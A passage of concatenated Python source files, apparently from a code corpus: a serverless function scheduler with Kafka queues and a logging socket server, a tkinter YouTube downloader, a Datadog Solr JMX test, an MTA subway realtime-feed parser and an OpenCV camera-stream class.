def fsLogging():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = (serverIp, logger_port)
# Listen for incoming connections
sock.bind(server_address)
sock.listen(15000)
count =0
print('starting Logger up on', server_address)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
# Receive the data in small chunks and retransmit it
while True:
data = connection.recv(1024)
data = data.decode("utf-8")
if data != '':
lockFunctionSideLogger.acquire()
with open("serverLogs.txt", "a") as logfile:
logfile.write(str(data))
count = count + 1
# print(str(data), count)
#update_records(str(data))
#publish_message(producer_FSQ, kafka_fsq_topic, 'raw', bytes(data, encoding = 'utf-8'))
## in-Memory
inMemoryFSQ.put(bytes(data, encoding = 'utf-8'))
lockFunctionSideLogger.release()
if not data:
# print('no more data from', client_address)
break
finally:
# Clean up the connection
connection.close()
# Entry point for worker threads
# Invokes a serverless function, then queues any children that need to be
# invoked after completion, according to the function chain's DAG
def invoker_thread(chain, timeStampList):
timeStampList.append(time.time())
# Get required information
url = chain.currentNode.function.url
instanceId = chain.instanceID
chainId = chain.chainID
functionId = chain.currentNode.function.id
nodeId = chain.currentNode.nodeID
lastNodeIdList = chain.currentNode.lastNodeIDs
chainFunctionIdList = chain.currentNode.chainFunctionIDs
hybrid = chain.flags["hybrid"]
# Build array of parameters to send to the function
# (mostly needed for uniquely identifying log messages)
PARAM = {"instanceId": instanceId,
"chainId": chainId,
"functionId": functionId,
"nodeId": nodeId,
"lastNodeIdList": str(lastNodeIdList),
"extras": [],
"chainFunctionIdList": str(chainFunctionIdList),
"hybrid": hybrid,
"id": 0}
PARAMS = {"id":str(PARAM),"port":logger_port,"ip":serverIp,"name":"functionSide"}
timeStampList.append(time.time())
timeStamp = 'consumerSide-start-'+str(time.time())+'-'+str(PARAM)
inMemoryCSSQ.put(bytes(timeStamp, encoding = 'utf-8'))
timeStampList.append(time.time())
# Do the invocation
if not mock_invocations:
res = requests.post(url = url, json = PARAMS, timeout = 300)
else:
print("Invoke:", url)
time.sleep(5)
timeStampList.append(time.time())
timeStamp = 'consumerSide-end-'+str(time.time())+'-'+str(PARAM)
inMemoryCSEQ.put(bytes(timeStamp, encoding = 'utf-8'))
timeStampList.append(time.time())
newInvocations = []
# Enqueue children to be invoked later by the scheduler
for i in chain.currentNode.children:
newInvocations.append(ChainState(currentNode=i, instanceID=instanceId, chainID=chainId))
for invocation in newInvocations:
enqueue_invocation(invocation.SerializeToString(), chainAlreadyRunning=True)
if hybrid == "local":
localCloudConcurrency.release()
timeStampList.append(time.time())
def enqueue_pending_or_running(invocation, chainAlreadyRunning):
if chainAlreadyRunning:
inMemoryCRQ.put(invocation)
else:
inMemoryPQ.put(invocation)
def enqueue_simple_priority(invocation, chainAlreadyRunning):
chain_state = inMemory_to_chain_state(invocation)
if chain_state is None:
return
if chain_state.chainID % 2 == 0:
inMemoryHighPriorityQueue.put(invocation)
else:
inMemoryLowPriorityQueue.put(invocation)
# Create a connection to the Kafka server
def connect_kafka_producer(url):
_producer = None
try:
_producer = KafkaProducer(bootstrap_servers=[url], api_version=(0, 10))
except Exception as ex:
print('Exception while connecting Kafka')
print(str(ex))
finally:
return _producer
# Publish a message to a Kafka queue
def publish_message(producer_instance, topic_name, key, value):
try:
key_bytes = bytes(key, encoding = 'utf-8')
value_bytes = value
producer_instance.send(topic_name, key=key_bytes, value=value_bytes)
producer_instance.flush()
#print('Message published successfully.')
except Exception as ex:
print('Exception in publishing message')
print(str(ex))
# Convert a Kafka message to a Chain State object
def message_to_chain_state(message):
if (message):
for key,value in message.items():
serialized_chain = value[0].value
chain_state = ChainState()
chain_state.ParseFromString(serialized_chain)
return chain_state
else:
return None
# Convert a queue item to a Chain State object
def inMemory_to_chain_state(message):
if (message):
chain_state = ChainState()
chain_state.ParseFromString(message)
return chain_state
else:
return None
def printLoggingLists():
print("\nrunning records list")
for i in logging_running_records:
print(i.printTimeStamp())
print("finished records list")
for i in logging_finished_records:
print(i.printTimeStamp())
# Class to represent all metadata associated with a timestamp
class TimeStamp:
def __init__(self, start, finish, type, instanceId, chainId, functionId, nodeId, lastNodeIdList, chainFunctionIdList):
self.start = start
self.finish = finish
self.type = type
self.instanceId = instanceId
self.chainId = chainId
self.functionId = functionId
self.nodeId = nodeId
self.lastNodeIdList = lastNodeIdList
self.chainFunctionIdList = chainFunctionIdList
def printTimeStamp(self):
return str(self.start)+"-"+str(self.finish)+"-"+str(self.type)+"-"+str(self.instanceId)+"-"+str(self.chainId)+"-"+str(self.functionId)+"-"+str(self.nodeId)+"-"+str(self.lastNodeIdList)
# Class representing the Metric Server state
class MetricServer:
def __init__(self):
self.collectiveFunctionLevelMetric = {
'totalRunningFunctions': 0,
'totalCompletedFunctions': 0
}
self.collectiveChainLevelMetric = {
'totalRunningChains': 0,
'totalCompletedChains': 0
}
self.functionQuotas = {}
self.functionPrioritiesList = []
self.chainPrioritiesList = []
self.arrivalsChainsMetricList = []
self.individualFunctionMetricList = []
self.individualChainMetricList = []
# collective Function Level Metrics
def getTotalRunningFunctions(self):
return self.collectiveFunctionLevelMetric['totalRunningFunctions']
# collective Chain Level Metrics
# individual function Level Metrics
def getTotalUniqueFunctions(self):
return len(self.individualFunctionMetricList)
def getUniqueFunctionsList(self):
return self.individualFunctionMetricList
# individual chain level Metrics
def getTotalUniqueChains(self):
return len(self.individualChainMetricList)
def getUniqueChainsList(self):
return self.individualChainMetricList
# Currently Running Chains Policy:
# Prioritize finishing function chains that have already started running
# over those that have not started
def currentlyRunningChainsPolicy():
time.sleep(inMemorySleep)
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
return chain
else:
if not(inMemoryPQ.empty()):
chain = inMemory_to_chain_state(inMemoryPQ.get())
return chain
else:
return None
# Fair Share on Chains Policy:
# Assign a fixed concurrency limit to all function chains
def fairShareOnChainsPolicy():
global previousState
time.sleep(inMemorySleep)
softLimitCRQ = kafkaCRQSoftLimit
softLimitPQ = kafkaPQSoftLimit
chainsToAvoid = getCandidateChainsAlreadyUsedQuota()
if (chainsToAvoid == []):
return currentlyRunningChainsPolicy()
while(softLimitCRQ > 0):
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
softLimitCRQ = softLimitCRQ - 1
if (chain.chainID not in chainsToAvoid):
return chain
else:
inMemoryCRQ.put(msg)
else:
softLimitCRQ = 0
while(softLimitPQ > 0):
if not(inMemoryPQ.empty()):
msg = inMemoryPQ.get()
chain = inMemory_to_chain_state(msg)
softLimitPQ = softLimitPQ - 1
if (chain.chainID not in chainsToAvoid):
return chain
else:
inMemoryPQ.put(msg)
else:
softLimitPQ = 0
return None
# Returns a list of function chains that fully saturate their respective
# concurrency limits.
def getCandidateChainsAlreadyUsedQuota():
csMetricServerLock.acquire()
candidateList = []
for i in metricServer.getUniqueChainsList():
if (i['functionsRunning'] >= round(concurrency/metricServer.getTotalUniqueChains())):
candidateList.append(i['chainId'])
csMetricServerLock.release()
return candidateList
# Shortest Job First Policy:
# Returns the queued chain invocation with the least time remaining
# (Currently, simply based on historical average runtimes)
def getShortestJobFirst():
time.sleep(inMemorySleep)
# variables
softLimitCRQ = kafkaCRQSoftLimit
softLimitPQ = kafkaPQSoftLimit
msg_baseCase = ''
chain_baseCase = ''
while(softLimitCRQ > 0):
if not(inMemoryCRQ.empty()):
# getting first object
if msg_baseCase == '':
msg_baseCase = inMemoryCRQ.get()
chain_baseCase = inMemory_to_chain_state(msg_baseCase)
else:
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
softLimitCRQ = softLimitCRQ - 1
# print((chain.chainID,chain.currentNode.nodeID), (chain_baseCase.chainID,chain_baseCase.currentNode.nodeID))
if (SJFLookup[(chain.chainID,chain.currentNode.nodeID)] < SJFLookup[(chain_baseCase.chainID,chain_baseCase.currentNode.nodeID)]):
inMemoryCRQ.put(msg_baseCase)
msg_baseCase = msg
chain_baseCase = chain
# print('updated baseCase')
else:
inMemoryCRQ.put(msg)
# print('no update')
if (softLimitCRQ == 1):
return chain_baseCase
else:
softLimitCRQ = 0
while(softLimitPQ > 0):
if not(inMemoryPQ.empty()):
if msg_baseCase == '':
msg_baseCase = inMemoryPQ.get()
chain_baseCase = inMemory_to_chain_state(msg_baseCase)
else:
msg = inMemoryPQ.get()
chain = inMemory_to_chain_state(msg)
softLimitPQ = softLimitPQ - 1
# print((chain.chainID,chain.currentNode.nodeID), (chain_baseCase.chainID,chain_baseCase.currentNode.nodeID))
if (SJFLookup[(chain.chainID,chain.currentNode.nodeID)] < SJFLookup[(chain_baseCase.chainID,chain_baseCase.currentNode.nodeID)]):
inMemoryPQ.put(msg_baseCase)
msg_baseCase = msg
chain_baseCase = chain
# print('updated baseCase')
else:
inMemoryPQ.put(msg)
# print('no update')
if (softLimitPQ == 1):
return chain_baseCase
else:
softLimitPQ = 0
if (chain_baseCase != ''):
return chain_baseCase
return None
# Fair Share on Functions Policy:
# Assign a fixed concurrency limit to all function types that can be invoked
def fairShareOnFunctionsPolicy():
time.sleep(inMemorySleep)
softLimitCRQ = kafkaCRQSoftLimit
softLimitPQ = kafkaPQSoftLimit
functionsToAvoid = getCandidateFunctionsAlreadyUsedQuota()
if (functionsToAvoid == []):
return currentlyRunningChainsPolicy()
while(softLimitCRQ > 0):
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
softLimitCRQ = softLimitCRQ - 1
if (chain.currentNode.function.id not in functionsToAvoid):
return chain
else:
inMemoryCRQ.put(msg)
else:
softLimitCRQ = 0
while(softLimitPQ > 0):
if not(inMemoryPQ.empty()):
msg = inMemoryPQ.get()
chain = inMemory_to_chain_state(msg)
softLimitPQ = softLimitPQ - 1
if (chain.currentNode.function.id not in functionsToAvoid):
return chain
else:
inMemoryPQ.put(msg)
else:
softLimitPQ = 0
return None
# Update function-based fair share limits according to what functions
# we have seen so far
def updateFairShareFunctionQuota():
psMetricServerLock.acquire()
totalFunctions = 0
uniqueFunctionList = []
uniqueFunctionQuota = {}
for i in metricServer.arrivalsChainsMetricList:
totalFunctions = totalFunctions + len(i['chainFunctionIdList'])
for j in i['chainFunctionIdList']:
if (j in uniqueFunctionList):
uniqueFunctionQuota[j] = uniqueFunctionQuota[j] + 1
else:
uniqueFunctionList.append(j)
uniqueFunctionQuota[j] = 1
psMetricServerLock.release()
# compute %age quota
for key in uniqueFunctionQuota:
uniqueFunctionQuota[key] = uniqueFunctionQuota[key]/totalFunctions
metricServer.functionQuotas = uniqueFunctionQuota
# Update reactive function-based fair share limits according to
# arrival rates of functions
def updateFairShareArrivalFunctionQuota():
psMetricServerLock.acquire()
totalFunctions = 0
uniqueFunctionList = []
uniqueFunctionQuota = {}
for i in metricServer.arrivalsChainsMetricList:
chainArrivalRate = 1
if (i['arrivalRate'] != 0):
chainArrivalRate = i['arrivalRate']
totalFunctions = totalFunctions + len(i['chainFunctionIdList'])*chainArrivalRate
for j in i['chainFunctionIdList']:
if (j in uniqueFunctionList):
uniqueFunctionQuota[j] = uniqueFunctionQuota[j] + 1 * chainArrivalRate
else:
uniqueFunctionList.append(j)
uniqueFunctionQuota[j] = 1 * chainArrivalRate
psMetricServerLock.release()
# compute %age quota
for key in uniqueFunctionQuota:
uniqueFunctionQuota[key] = uniqueFunctionQuota[key]/totalFunctions
metricServer.functionQuotas = uniqueFunctionQuota
# Returns a list of functions that fully saturate their respective
# concurrency limits.
def getCandidateFunctionsAlreadyUsedQuota():
candidateList = []
functionQuotas = metricServer.functionQuotas
for i in metricServer.getUniqueFunctionsList():
psMetricServerLock.acquire()
#print(i['functionId'],i['instancesRunning'],round(concurrency*functionQuotas[int(i['functionId'])]))
if (i['instancesRunning'] >= round(concurrency*functionQuotas[int(i['functionId'])])):
#if (i['functionsRunning'] >= 1):
candidateList.append(i['functionId'])
psMetricServerLock.release()
return candidateList
previousPriorityList = []
# Strict Function Priority Policy:
# Functions are assigned priorities and higher priority functions
# are always served first
def strictFunctionPriorityPolicy():
global previousPriorityList
time.sleep(inMemorySleep)
softLimitCRQ = kafkaCRQSoftLimit
softLimitPQ = kafkaPQSoftLimit
priorityList = metricServer.functionPrioritiesList
choice = None
choice_msg = ""
while(softLimitCRQ > 0):
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
softLimitCRQ = softLimitCRQ - 1
if (chain.currentNode.function.id in priorityList):
if (choice == None):
choice = chain
choice_msg = msg
elif (priorityList.index(choice.currentNode.function.id)> priorityList.index(chain.currentNode.function.id)):
inMemoryCRQ.put(choice_msg)
choice = chain
choice_msg = msg
else:
inMemoryCRQ.put(msg)
if (priorityList.index(choice.currentNode.function.id) == 0):
return choice
else:
inMemoryCRQ.put(msg)
else:
softLimitCRQ = 0
while(softLimitPQ > 0):
if not(inMemoryPQ.empty()):
msg = inMemoryPQ.get()
chain = inMemory_to_chain_state(msg)
softLimitPQ = softLimitPQ - 1
if (chain.currentNode.function.id in priorityList):
if (choice == None):
choice = chain
choice_msg = msg
elif (priorityList.index(choice.currentNode.function.id)> priorityList.index(chain.currentNode.function.id)):
inMemoryPQ.put(choice_msg)
choice = chain
choice_msg = msg
else:
inMemoryPQ.put(msg)
if (priorityList.index(choice.currentNode.function.id) == 0):
return choice
else:
inMemoryPQ.put(msg)
else:
softLimitPQ = 0
return choice
# Hybrid Bin Packing Policy:
# Invoke functions on a local/private cloud, then fall back to
# a public cloud if the local cloud is at full capacity
def hybridBinPackingPolicy():
time.sleep(inMemorySleep)
if not(inMemoryCRQ.empty()):
msg = inMemoryCRQ.get()
chain = inMemory_to_chain_state(msg)
if (localCloudConcurrency._value < 1):
chain.flags["hybrid"] = "remote"
else:
chain.flags["hybrid"] = "local"
return chain
else:
if not(inMemoryPQ.empty()):
chain = inMemory_to_chain_state(inMemoryPQ.get())
if (localCloudConcurrency._value < 1):
chain.flags["hybrid"] = "remote"
else:
chain.flags["hybrid"] = "local"
return chain
else:
return None
# Simple Queue Priority Policy:
# Function level first come first serve, but we prioritize functions
# from the High Priority queue over the Low Priority queue
def simpleQueuePriorityPolicy():
if not(inMemoryHighPriorityQueue.empty()):
msg = inMemoryHighPriorityQueue.get()
chain = inMemory_to_chain_state(msg)
return chain
else:
if not(inMemoryLowPriorityQueue.empty()):
chain = inMemory_to_chain_state(inMemoryLowPriorityQueue.get())
return chain
else:
return None
# instantiating MetricServer
metricServer = MetricServer()
previousState = []
# setup kafka
kafka_url = "localhost:9092"
kafka_pq_topic = "pending_queue"
#print('Kafka setup for PQ ...')
producer_PQ = connect_kafka_producer(kafka_url)
consumer_PQ = KafkaConsumer(kafka_pq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for CRQ ...')
kafka_crq_topic = "chain_running_queue"
producer_CRQ = connect_kafka_producer(kafka_url)
consumer_CRQ = KafkaConsumer(kafka_crq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for FSide-logging ..')
kafka_fsq_topic = "function_side_logging_queue"
producer_FSQ = connect_kafka_producer(kafka_url)
consumer_FSQ = KafkaConsumer(kafka_fsq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for CSide logging ..')
kafka_csq_topic = "consumer_side_logging_queue"
producer_CSQ = connect_kafka_producer(kafka_url)
consumer_CSQ = KafkaConsumer(kafka_csq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for PSide logging ..')
kafka_psq_topic = "producer_side_logging_queue"
producer_PSQ = connect_kafka_producer(kafka_url)
consumer_PSQ = KafkaConsumer(kafka_psq_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
#print('Kafka setup for CSide logging ..')
kafka_csl_topic = "consumer_side_logging"
producer_CSL = connect_kafka_producer(kafka_url)
consumer_CSL = KafkaConsumer(kafka_csl_topic,
auto_offset_reset='latest',
bootstrap_servers=[kafka_url],
api_version=(0, 10),
consumer_timeout_ms=10000000)
## in memory queue
inMemoryPQ = queue.Queue(maxsize=queueSize)
inMemoryCRQ = queue.Queue(maxsize=queueSize)
inMemoryFSQ = queue.Queue(maxsize=queueSize)
inMemoryCSQ = queue.Queue(maxsize=queueSize)
inMemoryCSSQ = queue.Queue(maxsize=queueSize)
inMemoryCSEQ = queue.Queue(maxsize=queueSize)
inMemoryPSQ = queue.Queue(maxsize=queueSize)
inMemoryCSL = queue.Queue(maxsize=queueSize)
# Only needed for the simple queue priority policy
inMemoryHighPriorityQueue = queue.Queue(maxsize=queueSize)
inMemoryLowPriorityQueue = queue.Queue(maxsize=queueSize)
# starting various threads
# kafka to in-memory PQ
threading.Thread(target=kafkaToInMemoryPQ).start()
# kafka to in-memory PSQ
threading.Thread(target=kafkaToInMemoryPSQ).start()
#print("Starting Logging Server")
threading.Thread(target=fsLogging).start()
#print("Starting Function Side metric-server")
threading.Thread(target=fsMetricServer).start()
#print("Starting Consumer Side metric-server")
threading.Thread(target=csMetricServer).start()
#print("Starting Producer Side metric-server")
threading.Thread(target=psMetricServer).start()
#print("Starting Consumer Side logger")
threading.Thread(target=csLogging).start()
# Start scheduling function invocations
schedule_invocations()
|
main.py
|
from pytube import YouTube
from tkinter.filedialog import *
from tkinter import *
from tkinter.messagebox import *
from threading import *
#total file size container
file_size=0
#function for updating percentage while downloading
def progress(stream,chunk,file_handle,remaining=None):
#fetching percentage of file that has been downloaded
file_downloaded=(file_size-file_handle)
percent=(file_downloaded/file_size) * 100
btn.config(text="{:00.0f} % downloaded".format(percent))
def startDownload():
global file_size
try:
#storing url given by user
url=urlField.get()
#changing button text
btn.config(text="Please wait...")
#disabling button
btn.config(state=DISABLED)
#opens dialog box to ask for saving location
path=askdirectory()
if path is None:
return
ob=YouTube(url,on_progress_callback=progress)
strm=ob.streams.get_highest_resolution()
#setting video size
file_size=strm.filesize
#setting video title and description
vTitle.config(text=strm.title)
vTitle.pack(side=TOP,pady=10)
vDesc.config(text=ob.description)
vDesc.pack(side=TOP,pady=10)
#command to start download
strm.download(path)
#setting button back to normal
btn.config(text="Start Download")
btn.config(state=NORMAL)
showinfo("Download Finished","Downloaded successfully")
urlField.delete(0,END)
#hiding video title
vTitle.pack_forget()
except Exception as e:
print(e)
showinfo("Error","Some error occurred...")
btn.config(text="Start Download")
btn.config(state=NORMAL)
urlField.delete(0,END)
#function to start download thread
def startDownloadThread():
#create thread
thread=Thread(target=startDownload)
thread.start()
#Building gui using tkinter
main=Tk()
#setting title
main.title("Youtube Downloader")
#setting icon
main.iconbitmap("youtube.ico")
main.geometry("500x600")
#heading icon
file=PhotoImage(file='youtube.png')
headingIcon=Label(main,image=file)
headingIcon.pack(side=TOP)
#url textfield
urlField=Entry(main,font=("verdana",18),justify=CENTER)
urlField.pack(side=TOP,fill=X,padx=10)
#download button
btn=Button(main,text="start download",font=("verdana",18),relief='ridge',command=startDownloadThread)
btn.pack(side=TOP,pady=10)
#video title
vTitle=Label(main,text="Video title",font=("verdana",13))
#video description
vDesc=Label(main,text="Video Description")
main.mainloop()
|
test_solr.py
|
# (C) Datadog, Inc. 2010-2017
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import threading
import time
from types import ListType
import unittest
import mock
import os
from nose.plugins.attrib import attr
import logging
from aggregator import MetricsAggregator
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/tmp/datadog/collector.log',
'forwarder_log_file': '/tmp/datadog/forwarder.log',
'dogstatsd_log_file': '/tmp/datadog/dogstatsd.log',
'jmxfetch_log_file': '/tmp/datadog/jmxfetch.log',
'go-metro_log_file': '/tmp/datadog/go-metro.log',
}
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from dogstatsd import Server
from jmxfetch import JMXFetch
STATSD_PORT = 8127
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='solr')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = os.path.join(os.path.dirname(__file__))
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testTomcatMetrics(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 8, metrics)
self.assertEquals(len([t for t in metrics if 'instance:solr_instance' in t['tags'] and t['metric'] == "jvm.thread_count"]), 1, metrics)
self.assertTrue(len([t for t in metrics if "jvm." in t['metric'] and 'instance:solr_instance' in t['tags']]) > 4, metrics)
self.assertTrue(len([t for t in metrics if "solr." in t['metric'] and 'instance:solr_instance' in t['tags']]) > 4, metrics)
|
mta_realtime.py
|
import gtfs_realtime_pb2, nyct_subway_pb2
import urllib2, contextlib, datetime, copy
from operator import itemgetter
from pytz import timezone
import threading, time
import csv, math, json
import logging
import google.protobuf.message
def distance(p1, p2):
return math.sqrt((p2[0] - p1[0])**2 + (p2[1] - p1[1])**2)
class MtaSanitizer(object):
_LOCK_TIMEOUT = 300
_tz = timezone('US/Eastern')
def __init__(self, key, stations_file, expires_seconds=None, max_trains=10, max_minutes=30, threaded=False):
self._KEY = key
self._MAX_TRAINS = max_trains
self._MAX_MINUTES = max_minutes
self._EXPIRES_SECONDS = expires_seconds
self._THREADED = threaded
self._stations = []
self._stops = {}
self._routes = {}
self._read_lock = threading.RLock()
self._update_lock = threading.Lock()
self.logger = logging.getLogger(__name__)
# initialize the stations database
try:
with open(stations_file, 'rb') as f:
self._stations = json.load(f)
for idx, station in enumerate(self._stations):
station['id'] = idx
except IOError as e:
print 'Couldn\'t load stations file '+stations_file
exit()
self._update()
if self._THREADED:
self._start_timer()
def _start_timer(self):
self.logger.info('Starting update thread...')
self._timer_thread = threading.Thread(target=self._update_timer)
self._timer_thread.daemon = True
self._timer_thread.start()
def _update_timer(self):
while True:
time.sleep(self._EXPIRES_SECONDS)
self._update_thread = threading.Thread(target=self._update)
self._update_thread.start()
@staticmethod
def _build_stops_index(stations):
stops = {}
for station in stations:
for stop_id in station['stops'].keys():
stops[stop_id] = station
return stops
def _update(self):
if not self._update_lock.acquire(False):
self.logger.info('Update locked!')
lock_age = datetime.datetime.now() - self._update_lock_time
if lock_age.total_seconds() > self._LOCK_TIMEOUT:
self._update_lock = threading.Lock()
self.logger.info('Cleared expired update lock')
return
self._update_lock_time = datetime.datetime.now()
self.logger.info('updating...')
# create working copy for thread safety
stations = copy.deepcopy(self._stations)
# clear old times
for station in stations:
station['N'] = []
station['S'] = []
station['routes'] = set()
stops = MtaSanitizer._build_stops_index(stations)
routes = {}
feed_urls = [
'http://datamine.mta.info/mta_esi.php?feed_id=1&key='+self._KEY,
'http://datamine.mta.info/mta_esi.php?feed_id=2&key='+self._KEY
]
for i, feed_url in enumerate(feed_urls):
mta_data = gtfs_realtime_pb2.FeedMessage()
try:
with contextlib.closing(urllib2.urlopen(feed_url)) as r:
data = r.read()
mta_data.ParseFromString(data)
except (urllib2.URLError, google.protobuf.message.DecodeError) as e:
self.logger.error('Couldn\'t connect to MTA server: ' + str(e))
self._update_lock.release()
return
self._last_update = datetime.datetime.fromtimestamp(mta_data.header.timestamp, self._tz)
self._MAX_TIME = self._last_update + datetime.timedelta(minutes = self._MAX_MINUTES)
for entity in mta_data.entity:
if entity.trip_update:
for update in entity.trip_update.stop_time_update:
time = update.arrival.time
if time == 0:
time = update.departure.time
time = datetime.datetime.fromtimestamp(time, self._tz)
if time < self._last_update or time > self._MAX_TIME:
continue
route_id = entity.trip_update.trip.route_id
if route_id == 'GS':
route_id = 'S'
stop_id = str(update.stop_id[:3])
station = stops[stop_id]
direction = update.stop_id[3]
station[direction].append({
'route': route_id,
'time': time
})
station['routes'].add(route_id)
try:
routes[route_id].add(stop_id)
except KeyError, e:
routes[route_id] = set([stop_id])
# sort by time
for station in stations:
if station['S'] or station['N']:
station['hasData'] = True
station['S'] = sorted(station['S'], key=itemgetter('time'))[:self._MAX_TRAINS]
station['N'] = sorted(station['N'], key=itemgetter('time'))[:self._MAX_TRAINS]
else:
station['hasData'] = False
with self._read_lock:
self._stops = stops
self._routes = routes
self._stations = stations
self._update_lock.release()
def last_update(self):
return self._last_update
def get_by_point(self, point, limit=5):
if self.is_expired():
self.update()
with self._read_lock:
sortable_stations = copy.deepcopy(self._stations)
sortable_stations.sort(key=lambda x: distance(x['location'], point))
return sortable_stations[:limit]
def get_routes(self):
return self._routes.keys()
def get_by_route(self, route):
if self.is_expired():
self.update()
with self._read_lock:
out = [ self._stops[k] for k in self._routes[route] ]
out.sort(key=lambda x: x['name'])
return out
def get_by_id(self, ids):
if self.is_expired():
self.update()
with self._read_lock:
out = [ self._stations[k] for k in ids ]
return out
def is_expired(self):
if self._THREADED:
# check that the update thread is still running
if not self._timer_thread.is_alive():
self._start_timer()
return False
elif self._EXPIRES_SECONDS:
age = datetime.datetime.now(self._tz) - self._last_update
return age.total_seconds() > self._EXPIRES_SECONDS
else:
return False
|
camera_stream.py
|
import cv2
import os
import time
from multiprocessing import Process,Queue
from tools import Drawing,DrawStatus,Bboxes2JSON
class CameraStream:
def __init__(self,camera_idx,video_hw=[512,512],show=False,save_dir=""):
self._camera_idx=camera_idx
self._video_hw=video_hw
self._show_bool=show
self._save_dir=save_dir
self._self2process_queue=Queue()
self._process2self_queue=Queue()
self._stopsignal_queue=Queue()
self._process=self._InitProcess()
def _InitProcess(self):
init_dict={}
init_dict["CAMERA_IDX"]=self._camera_idx
init_dict["VIDEO_HW"]=self._video_hw
init_dict["SHOW_BOOL"]=self._show_bool
init_dict["SAVE_DIR"]=self._save_dir
self._self2process_queue.put(init_dict)
process=Process(target=self._FrameStream,args=(self._self2process_queue,self._process2self_queue,self._stopsignal_queue))
return process
def _FrameStream(self,self2process_queue,process2self_queue,stopsignal_queue):
def _InitCurSaveDir(cur_save_dir):
if(os.path.exists(cur_save_dir)==False):
os.mkdir(cur_save_dir)
if(os.path.exists(cur_save_dir+"/img")==False):
os.mkdir(cur_save_dir+"/img")
else:
all_files=os.listdir(cur_save_dir+"/img")
for _file in all_files:
file_path=cur_save_dir+"/img/"+_file
if(os.path.isfile(file_path)==True):
os.remove(file_path)
if(os.path.exists(cur_save_dir+"/json")==False):
os.mkdir(cur_save_dir+"/json")
else:
all_files=os.listdir(cur_save_dir+"/json")
for _file in all_files:
file_path=cur_save_dir+"/json/"+_file
if(os.path.isfile(file_path)==True):
os.remove(file_path)
init_dict=self2process_queue.get()
camera_idx=init_dict["CAMERA_IDX"]
video_hw=init_dict["VIDEO_HW"]
show_bool=init_dict["SHOW_BOOL"]
save_dir=init_dict.get("SAVE_DIR","")
cur_bboxes=None
camera_capture=cv2.VideoCapture(camera_idx)
if not camera_capture.isOpened():
raise Exception("CameraStream _FrameStream Error: Cannot open camera.")
camera_capture.set(cv2.CAP_PROP_FRAME_WIDTH,video_hw[1])
camera_capture.set(cv2.CAP_PROP_FRAME_HEIGHT,video_hw[0])
data_dict={}
recording_bool=False
recording_count=0
frame_count=0
cur_save_dir=None
while(1):
if(stopsignal_queue.empty()==False):
signal_dict=stopsignal_queue.get()
if(signal_dict.get("STOP_SIGNAL",False)==True):
stopsignal_queue.put({"STOP_SIGNAL":True})
break
ret,frame=camera_capture.read()
show_frame=frame.copy()
while not process2self_queue.empty():
process2self_queue.get()
process2self_queue.put({"FRAME":frame})
if(show_bool==True):
if(recording_bool==True):
show_frame=DrawStatus(show_frame,status_str="Recording",bgr=(0,255,0))
cv2.imwrite(cur_save_dir+"/img/"+str(frame_count)+".jpg",frame)
else:
show_frame=DrawStatus(show_frame,status_str="Not Recording",bgr=(0,0,255))
if(self2process_queue.empty()==False):
data_dict=self2process_queue.get()
bboxes=data_dict.get("BBOXES",None)
if(type(bboxes)!=type(None)):
cur_bboxes=bboxes
if(recording_bool==True):Bboxes2JSON(bboxes,cur_save_dir+"/json/"+str(frame_count)+".json")
bboxes=None
if(type(cur_bboxes)!=type(None)):
show_frame=Drawing(show_frame,cur_bboxes,thickness=1)
cv2.imshow('DEMO',show_frame)
key_type=cv2.waitKey(1)
if(key_type==ord("q")):
stopsignal_queue.put({"STOP_SIGNAL":True})
break
elif(key_type==ord('r')):
if(recording_bool==False):
cur_save_dir=save_dir+"/"+str(recording_count)
_InitCurSaveDir(cur_save_dir)
frame_count=0
recording_count+=1
recording_bool=True
elif(key_type==ord('c')):
if(recording_bool==True):
recording_bool=False
frame_count+=1
time.sleep(0.001)
if(show_bool==True):cv2.destroyAllWindows()
camera_capture.release()
return
def Start(self):
self._process.start()
self.GetFrame()
return
def Stop(self):
self._stopsignal_queue.put({"STOP_SIGNAL":True})
